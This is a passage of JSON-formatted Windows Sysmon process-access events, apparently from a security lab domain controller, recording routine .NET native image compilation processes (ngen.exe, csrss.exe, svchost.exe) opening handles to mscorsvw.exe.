C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:34.445","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-224E-5F25-0000-0010BFF50C00}","TargetProcessId":"3424","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7306,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:34.445\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-224E-5F25-0000-0010BFF50C00}\r\nTargetProcessId: 3424\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:34.445","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-224E-5F25-0000-0010BFF50C00}","TargetProcessId":"3424","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7307,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:34.445\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-224E-5F25-0000-0010BFF50C00}\r\nTargetProcessId: 3424\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:34.445","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-224E-5F25-0000-0010BFF50C00}","TargetProcessId":"3424","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7308,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:34.507\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2243-5F25-0000-00101F370C00}\r\nTargetProcessId: 3664\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:34.507","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2243-5F25-0000-00101F370C00}","TargetProcessId":"3664","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7309,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:34.507\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2243-5F25-0000-00101F370C00}\r\nTargetProcessId: 3664\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:34.507","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2243-5F25-0000-00101F370C00}","TargetProcessId":"3664","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7310,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:34.523\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-224E-5F25-0000-001044F90C00}\r\nTargetProcessId: 3664\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:34.523","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-224E-5F25-0000-001044F90C00}","TargetProcessId":"3664","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7311,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:34.570\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-224E-5F25-0000-001018FD0C00}\r\nTargetProcessId: 2256\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:34.570","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-224E-5F25-0000-001018FD0C00}","TargetProcessId":"2256","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7312,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:34.570\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-224E-5F25-0000-001018FD0C00}\r\nTargetProcessId: 2256\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:34.570","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-224E-5F25-0000-001018FD0C00}","TargetProcessId":"2256","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
